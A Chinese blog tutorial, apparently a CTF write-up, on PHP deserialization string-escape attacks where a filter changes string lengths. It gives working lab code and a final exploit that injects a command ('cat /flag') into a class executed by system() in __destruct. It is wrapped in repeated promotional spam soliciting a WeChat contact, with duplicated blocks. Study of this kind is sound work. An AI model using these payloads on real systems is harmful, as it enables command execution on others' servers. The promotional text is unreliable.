先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7
深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
正文
那我们需要一点东西去填充name的值,好让php能把我们的序列化字符串去反序列化而不是当作字符串读取,这时就可以借助前面提到的过滤函数了
function filter\_repmore($str) //利用一个变量修改目标变量
{
return str\_replace('b','cc',$str); //把b换成cc,过滤后序列化整体字符串变长
}
前面我们也分析了,每有一个b,就会多出一个c无法被当做正常字符串去读取,而是按照正常流程去反序列化下一个属性和对应的值, ";s:4:“info”;s:6:“hacker”;} 这个我们输入的序列化字符串长度为27
如果我们把name的值换成27个b+序列化字符串,27个b就会被过滤替换为54个c,而在反序列化时,由于name的长度在序列化时就确定为54(27个b+序列化字符串),php就会把前面54个c当作name的值来读取,后面的序列化字符串就会逃逸出去,正常反序列化,从而修改info,如:
<?php
include "func.php";
function filter\_repmore($str)
//利用一个变量修改目标变量
{
return str\_replace('b','cc',$str);
}
class A{
public $name='ben';
public $info="ctfer";
}
$test1=new A();
print\_r($test1)."\n";
echo "\n".serialize($test1)."\n";
$tar='";s:4:"info";s:6:"hacker";}'; //27
$payload=get\_payload('b',strlen($tar),$tar); //利用getpayload生成利用的payload
$test1->name=$payload;
print\_r($test1)."\n";
print\_r(serialize($test1))."\n";
$res=filter\_repmore(serialize($test1));
echo "\n".$res."\n";
$c=unserialize($res);
print\_r($c);
?>
可以看到,info的值被修改了
接下来以一道简单的题目来讲构造流程
题目实战
newstarctf 2024 week4 逃
可以看到,这里有个waf过滤函数,把对象序列化并过滤后再反序列化,是过滤后变长的题型
总体思路—>利用我们能控制的key去修改cmd,在__destruct中system执行cmd
具体实现:
1拿下来源码放在本地,稍作修改:
<?php
include "func.php";
//highlight\_file(\_\_FILE\_\_);
function waf($str)
{
return str\_replace("bad", "good", $str);
}
//利用key去修改cmd key=
class GetFlag
{
public $key='123';
public $cmd = "ls"; #cmd是我们要去修改的,先写死
public function \_\_construct($key)
{
$this->key = $key;
}
public function \_\_destruct()
{
system($this->cmd);
}
}
echo serialize(new GetFlag()); #
这段代码就是查看正常的序列化后的字符串(其中含有我们想要的cmd值),当然如果对序列化熟悉的话可以直接构造payload
把红框部分拿下来即可
2.配合前面写的get_payload函数构造payload,并在本地尝试是否成功
bad被替换为good,一个bad可以逃逸一个字符,所以需要直接传入序列化字符串长度即可
可以看到,在本地实验成功,接下来只要修改cmd的值为其他系统命令,再修改序列化字符串中cmd的长度,然后把$payload传过去即可
最后的exp:
<?php
include "func.php";
//highlight\_file(\_\_FILE\_\_);
function waf($str)
{
return str\_replace("bad", "good", $str);
}
//利用key去修改cmd
class GetFlag
{
public $key='ls';
public $cmd = "whoami";
public function \_\_construct($key)
{
$this->key = $key;
}
public function \_\_destruct()
{
system($this->cmd);
}
}
$key='";s:3:"cmd";s:9:"cat /flag";}';
$payload=get\_payload('bad',strlen($key),$key);
echo "\n".$payload;
?>
把payload赋值为key即可,
结果:
过滤后变短
实验学习
<?php
include "func.php";
function filter\_repless($str)
//利用两个变量修改目标变量
{
return str\_replace('b','',$str);
}
class C{
// name全填上会被替换的内容
public $name='ben';
// info填payload
public $info="ctfer";
public $password='123456';
}
像上面的过滤函数,把b替换为空,替换后序列化的字符串长度减少,就是过滤后变短的情况,这一种就是与变长不同,要利用两个变量(info和name)去修改两个变量(info和password)
第一步,也是要先拿到我们含有修改目标的序列化字符串,name值随意
我们的目的也是一样的,要通过";构造闭合,然后让php来反序列化我们设计好的序列化字符串,从而修改变量,尝试把info的值赋值为上面红框里的序列化字符串,那为什么不跟变长的类型一样,直接把序列化字符串跟在name的值后面呢?看下图:
如果跟在name后面,由于name的长度本身就很长,过滤后name的值变短了,我们的序列化字符串就会被读取为name的值(逃不出去),就无法发挥它的作用了,所以要把info的值设为序列化字符串
如果要让绿框内的字符串正常反序列化,而不是被当作字符串读取,红框内的全部内容就填充进name的值中,";s:4:“info”;s:60:"长度为19,如果name的值设为19个b,经过过滤函数过滤为空后,那么php就会往下读取,把本不该读取的 “;s:4:“info”;s:60:” 读取为name的值,后面的序列化字符串就会逃逸出去,不被当作字符串来读取,而是被成功反序列化,修改info
完整实验代码:
<?php
include "func.php";
function filter\_repless($str)
//利用两个变量修改目标变量
{
return str\_replace('b','',$str);
}
class C{
// name全填上会被替换的内容
public $name='ben';
// info填payload
public $info="ctfer";
public $password='123456';
}
$test1=new C();
echo serialize($test1)."\n";
$tar='";s:4:"info";s:6:"hacker";s:8:"password";s:10:"helloworld";}';
$test1->name=get\_payload('b',19);
$test1->info=$tar;
print\_r(($test1));
$res=serialize($test1);
$r=filter\_repless($res);
echo $res;
echo "\n".$r."\n";
$c=unserialize($r);
print\_r($c);
?>
反序列化成功,password被修改,name具体要多少个被替换的字符,要根据题目实际来计算
题目实战
上网找了一个也是比较简单的题目的源码
<?php
show\_source("index123.php");
//error\_reporting(0);
function filter($str)
{
return preg\_replace('/abc|zcxx/','',$str);
}
class Login{
public $name;
public $pwd;
public $money;
public function \_\_construct()
{
$this->name=$\_GET['name'];
$this->pwd=$\_GET['pwd'];
$this->money='999';
}
}
if($\_GET['name']&&$\_GET['pwd']) {
$login = new Login();
$last = unserialize(filter(serialize($login)));
if ($last->money < 1000) {
echo('get more money');
} else {
echo file\_get\_contents('flag.php');
}
}
else
{
die("name and password can't be null");
}
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。
最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。
### 学习路线图
其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。
相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。
#### 网络安全工具箱
当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份**我自己整理的网络安全入门工具以及使用教程和实战。**
#### 项目实战
最后就是项目实战,这里带来的是**SRC资料&HW资料**,毕竟实战是检验真理的唯一标准嘛~
#### 面试题
归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
mg_convert/35fc46df24091ce3c9a5032a9919b755.jpeg)
#### 面试题
归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
[外链图片转存中...(img-AagVGxVE-1713168958013)]
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
